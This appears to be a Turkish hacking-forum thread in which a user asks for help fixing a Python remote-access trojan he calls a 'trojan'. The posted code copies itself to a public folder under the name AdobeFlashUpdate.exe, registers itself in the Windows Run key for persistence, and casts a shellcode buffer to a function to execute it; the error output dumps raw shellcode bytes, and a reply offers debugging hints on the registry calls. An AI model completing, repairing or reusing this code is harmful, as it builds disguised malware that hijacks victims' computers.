Zararlı Yazılım Python Kodlama hata

rock277

Üye
20 Haz 2019
68
0
Merhaba arkadaşlar pythonda rat oluşturmaya çalışıyorumda shellcode ile ancak çalıştırınca bir takım hatalar alıyorum yardım edebilir misiniz_? Aşağıda yazılan kodlar ve Alınan hatalar var....

Kodlar:

@ import os import os.path import platform import shutil import sys import threading import win32api, win32con import win32event, winerror from winreg import * from ctypes import * jurmaGh3AA23f = "C:\\Users\Public\\Libraries\\AdobeFlashUpdate.exe" class thji73ns9m(threading.Thread): def run(self): shutil.copy(sys.argv[0],jurmaGh3AA23f) aReg = ConnectRegistry(None,HKEY_CURRENT_USER) aKey = OpenKey(aReg, r"SOFTWARE\Microsoft\Windows\CurrentVersion\Run", 0, KEY_WRİTE) SetValueEx(aKey, "AdobeFlashUpdate", 0, REG_SZ, jurmaGh3AA23f) buf "" THSse278snmKL4aC = create_string_buffer(buf, len(buf)) Jkdm230fcxz0RTjJ = cast(THSse278snmKL4aC, CFUNCTYPE(c_****_p)) if os.path.isfile(jurmaGh3AA23f) == false: thji73ns9m().start() else: print("\nErro") Jkdm230fcxz0RTjJ() [/USER] Alınan Hata: Traceback (most recent call last): File "C:\Users\seni_\Desktop\shell.py", line 54, in <module> THSse278snmKL4aC = create_string_buffer(buf, len(buf)) File "C:\Users\seni_\AppData\Local\Programs\Python\Python37-32\lib\ctypes\__init__.py", line 63, in create_string_buffer raise TypeError(init) TypeError: ÙÀÙt$ô[ºN}— )ɱ^ƒëü1SSZŸb܊ݍJ‚ø{‚sˆ+2÷ÜǹUõ\ÏqúÕz¤5æהTd*ɶU嶒ìêKVCø"X²£ØEÅÉÛœÉÚΔCŐ~çnV6Ž2—÷}Jß?ž9)<#:î?ÿÏõçtwÒXî‘dý8¨©uD!LZÍqk~–"'r„+7ÝyŽ3ón£›CŽ¡[̙ÒiS2}Áœz&7XÙ¸™<ìÉV´¦9X÷•3æ§UäŽ*ZۯͱtÇ%9{2Lq®Ç…àE&x‡ì+ï#aØÁÄysY**fxÙC…èÔÝîè‚AgÎi!˜ghRܧVMÞԟ$ÌøÆ ÒmÆfÖ'‘ÔՀ'ufÆØ^¼ïžÞªOÞ*FÞB>}wA¨¢+ÔS’˜<ÆHãã-Ëä³äLsKµlƒ!5=ë¾²Û?±›sµTiâÊ|/ºËsôM±Ð ®Fh¯F-ŽŒäÓ #÷f’ˆT·;

rock277

Üye
20 Haz 2019
68
0
Kodunuzu bir paste sitesine yükleyip, okunabilir değişken adları kullanırsanız daha yardımcı olabiliriz
Kodlarım zaten okunaklı sadece aldığım hata okunamıyor onu bende anlamadım nasıl düzgün şekilde görüntüleyebilirim_? Yazdıgım kodları tekrar yazıyorum size..;

Kod:

import os
import os.path
import platform
import shutil
import sys
import threading
import win32api, win32con
import win32event, winerror
from winreg import *
from ctypes import *

jurmaGh3AA23f = "C:\\Users\Public\\Libraries\\AdobeFlashUpdate.exe"

class thji73ns9m(threading.Thread):

def run(self):
shutil.copy(sys.argv[0],jurmaGh3AA23f)
aReg = ConnectRegistry(None,HKEY_CURRENT_USER)
aKey = OpenKey(aReg, r"SOFTWARE\Microsoft\Windows\CurrentVersion\Run", 0, KEY_WRİTE)
SetValueEx(aKey, "AdobeFlashUpdate", 0, REG_SZ, jurmaGh3AA23f)
buf ""
THSse278snmKL4aC = create_string_buffer(buf, len(buf))
Jkdm230fcxz0RTjJ = cast(THSse278snmKL4aC, CFUNCTYPE(c_****_p))

if os.path.isfile(jurmaGh3AA23f) == false:
thji73ns9m().start()
else:
print("\nErro")

Jkdm230fcxz0RTjJ()

Alınan Hata:

Traceback (most recent call last):
File "C:\Users\seni_\Desktop\shell.py", line 54, in <module>
THSse278snmKL4aC = create_string_buffer(buf, len(buf))
File "C:\Users\seni_\AppData\Local\Programs\Python\Pyth on37-32\lib\ctypes\__init__.py", line 63, in create_string_buffer
raise TypeError(init)
TypeError: ÙÀÙt$ô[ºN}— )ɱ^ƒëü1SSZŸb܊ݍJ‚ø{‚sˆ+2÷ÜǹUõ\ÏqúÕz¤5æהTd* ɶU嶒ìêKVCø"X²£ØEÅÉÛœÉÚΔCŐ~çnV6Ž2—÷}Jß ?ž9)<#:î?ÿÏõçtwÒXî‘dý8¨©uD!LZÍqk~–"'r„+7ÝyŽ3ón £›CŽ¡[̙ÒiS2}Áœz&7XÙ¸™<ìÉV´¦9X÷•3æ§UäŽ*ZۯͱtÇ%9{ 2Lq®Ç…àE&x‡ì+ï#aØÁÄysY**fxÙC…èÔÝîè‚AgÎi!˜gh RܧVMÞԟ$ÌøÆ ÒmÆfÖ'‘ÔՀ'ufÆØ^¼ïžÞªOÞ*FÞB>}wA¨¢+ÔS’˜<ÆHã ã-Ëä³äLsKµlƒ!5=ë¾²Û?±›sµTiâÊ|/ºËsôM±Ð ®Fh¯F-ŽŒäÓ #÷f’ˆT·

Trakyali59

Yeni üye
24 Mar 2018
45
0
Hocam kodunuzun son halinde aReg degiskeninde donen deger a keyde degıskeni icin kullandıginiz fonksiyonu etkiliyor openkey fonksiyonuna dikkat edin kullanımına ve aReg = ConnectRegistry(None,HKEY_CURRENT_USER) suraya dikkat ayrıca bir class acmissiniz eger fonksiyon class icindeyse fonksiyonu class in icine dogru yazin online python compiler de denedim aReg ve openkey olayini cözemedigim icin dikkat et diyorum yanlış bir sey varsa affola hocam

rock277

Üye
20 Haz 2019
68
0
Hocam kodunuzun son halinde aReg degiskeninde donen deger a keyde degıskeni icin kullandıginiz fonksiyonu etkiliyor openkey fonksiyonuna dikkat edin kullanımına ve aReg = ConnectRegistry(None,HKEY_CURRENT_USER) suraya dikkat ayrıca bir class acmissiniz eger fonksiyon class icindeyse fonksiyonu class in icine dogru yazin online python compiler de denedim aReg ve openkey olayini cözemedigim icin dikkat et diyorum yanlış bir sey varsa affola hocam
Öncelikle cevabın için teşekkürler , sabahtır uğrasıyorum hala neresinde sorun var anlamadım :yorgun:yorgun

aregin olayı regedite giriyor ve openkey ilede orada bir regedit klasoru acıyor yani trojanı kopyalıyor yani ben bu mantıkla yazdım , ne yapmam gerek nasıl düzeltebilirim birisi yardımcı olsun lütfen.. _? :uzgun1

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.